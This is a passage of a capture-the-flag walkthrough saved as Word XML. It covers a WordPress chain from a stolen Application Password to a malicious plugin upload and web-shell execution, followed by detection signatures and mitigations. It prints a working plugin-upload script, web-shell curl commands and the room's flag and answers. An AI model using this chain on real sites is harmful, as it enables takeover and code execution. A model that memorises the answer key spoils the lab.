        <w:t xml:space="preserve">Figure 9 — callback.php: a server-side curl POST to /wp-json/wp/v2/pages using the stolen credential as HTTP Basic auth.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callback.php uses the stolen credential immediately to publish a page through the REST API and records the response code. The result is HTTP 201 — WordPress created a new page using the stolen Application Password, proving the credential works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B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114300" distR="114300">
            <wp:extent cx="5669280" cy="2765502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55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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10 — publish_result.txt shows HTTP 201: the page was created with the stolen credential.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spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c70pdk8zf8si" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7 — From Application Password to RCE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Administrators keep the unfiltered_html capability by default, so the page callback.php just published can contain a small embedded script. Once that page loads — same-origin, with the admin’s real session cookies intact — the script finishes the job: it reads a fresh nonce from the plugin-install page, fetches payload.zip, and POSTs it to update.php?action=upload-plugin to upload and extract the malicious plugin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:left w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:bottom w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:right w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="276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let uploadResp = await fetch("/wp-admin/plugin-install.php?tab=upload", {credentials:"include"});</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">let html = await uploadResp.text();</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">let nonce = html.match(/name="_wpnonce"\s+value="([^"]+)"/)[1];</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">let zipBlob = await (await fetch("/get-payload.php")).blob();</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">let form = new FormData();</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">form.append("_wpnonce", nonce);</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">form.append("pluginzip", zipBlob, "payload.zip");</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">await fetch("/wp-admin/update.php?action=upload-plugin", {method:"POST", body: form, credentials:"include"});</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">let shell = await fetch("/wp-content/plugins/payload/shell.php");</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">document.title = "RCE-DONE:" + await shell.text();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114300" distR="114300">
            <wp:extent cx="5669280" cy="1915794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157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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 11 — The embedded same-origin script: pull a nonce, fetch payload.zip, upload it as a plugin, then hit shell.php.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WordPress extracts the uploaded ZIP to wp-content/plugins/payload/ without requiring activation, so shell.php inside it is reachable directly by URL. Requesting it confirms code execution — the JSON body reports rce:true running as user www-data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:left w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:bottom w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:right w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="276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curl -i http://postcraft.thm:8080/wp-content/plugins/payload/shell.php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114300" distR="114300">
            <wp:extent cx="5669280" cy="1272840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72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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 12 — shell.php responds with rce:true and user www-data — full remote code execution confirmed.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spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mi80702tvkwb" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 8 — Read the Flag via the Web Shell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The flag sits one directory above the web root, out of reach of a direct URL. shell_exec() does not care about document roots, so it is read through the web shell’s cmd parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:left w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:bottom w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:right w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="276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curl -s "http://postcraft.thm:8080/wp-content/plugins/payload/shell.php?cmd=cat%20/var/www/flag.txt"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114300" distR="114300">
            <wp:extent cx="5669280" cy="2630773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307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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 13 — The web shell runs cat /var/www/flag.txt and returns the flag in the HTTP response.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76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Flag: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THM{xss2sh3ll_dom_cl0bb3r_2_rce}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Title"/>
        <w:spacing w:after="0" w:before="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="366091"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a0eoyrwpoilv" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Room Answers</w:t>
      </w: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Question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Answer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What version of WordPress core is running on the target?</w:t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7.0.2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What HTTP status code does publish_result.txt show for the page WordPress created using the stolen Application Password?</w:t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Read the flag file through the webshell. What is the flag?</w:t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THM{xss2sh3ll_dom_cl0bb3r_2_rce}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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76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3052508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25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line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 14 — All three room questions answered correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/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line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/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line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/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line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/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line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/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line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/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line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/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Title"/>
        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p64fhaa2r86" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection &amp; Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8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Every request in this chain was plain traffic to the site’s own login page and REST API; nothing about the transport looked abnormal. What gave it away was the shape of a handful of specific requests:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9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line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A POST /wp-login.php request where the log parameter contains a literal “&lt;” immediately followed by whitespace. This shape has no legitimate use in a username and is unique to this technique.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line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A REST API request containing _jsonp=window.opener (or any _jsonp value that is not a simple identifier — no dots, no bare function name).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line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A POST to /wp-json/wp/v2/users/*/application-passwords (credential creation) immediately followed by a wp/v2/pages publish from the same session within a few seconds — not a normal admin workflow.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line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A newly installed, briefly active plugin directory under wp-content/plugins/ — especially one installed and removed again within minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="36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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="864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Control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What it prevents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Update to WordPress 7.0.3 or later</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Restores esc_html() around the username in the login error message, closing the entry point entirely.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Disable Application Passwords if unused (add_filter('wp_is_application_passwords_available', '__return_false'))</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Removes the credential the SOME chain is trying to steal, even if a similar entry point is found elsewhere.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Monitor for unexpected Application Password creation events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Catches the escalation step directly — useful even against variations of this chain.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Restrict plugin install/activation to trusted admins; monitor plugin changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Limits how far a stolen Application Password can go.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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76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Quick Summary: a single-character blind spot between two HTML parsers — a space after “&lt;” — is enough, when combined with the login page’s own scripts and WordPress’s default capabilities, to carry an attacker from an unauthenticated form field all the way to a root-of-the-app web shell.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId21" w:type="default"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="1440" w:left="1440" w:right="1440" w:header="720" w:footer="14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nsolas"/>
  <w:font w:name="Roboto Mono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layfair Display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exend Medium">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId9" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId10" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Lexend">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId11" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId12" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Roboto Mono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  <w:font w:name="Nova Mono">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId1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C">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Lexend Medium" w:cs="Lexend Medium" w:eastAsia="Lexend Medium" w:hAnsi="Lexend Medium"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Lexend Medium" w:cs="Lexend Medium" w:eastAsia="Lexend Medium" w:hAnsi="Lexend Medium"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Written by: Belizaire Bassette II</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Lexend Medium" w:cs="Lexend Medium" w:eastAsia="Lexend Medium" w:hAnsi="Lexend Medium"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Lexend Medium" w:cs="Lexend Medium" w:eastAsia="Lexend Medium" w:hAnsi="Lexend Medium"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">▎ Security Researcher &amp; Author — PostCraft / CVE-2026-64638 Overview/Walkthrough · Portfolio Link: https://bebasset.github.io/ · Oct 2026</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Lexend Medium" w:cs="Lexend Medium" w:eastAsia="Lexend Medium" w:hAnsi="Lexend Medium"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16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 Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:after="2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00" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Playfair Display" w:cs="Playfair Display" w:eastAsia="Playfair Display" w:hAnsi="Playfair Display"/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rFonts w:ascii="Playfair Display" w:cs="Playfair Display" w:eastAsia="Playfair Display" w:hAnsi="Playfair Display"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8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image" Target="media/image5.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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Lexend-regular.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LexendMedium-bold.ttf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-regular.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lexend-bold.ttf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LexendMedium-regular.ttf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.ttf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.ttf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NovaMono-regular.ttf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-boldItalic.ttf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay-regular.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay-bold.ttf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay-italic.ttf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay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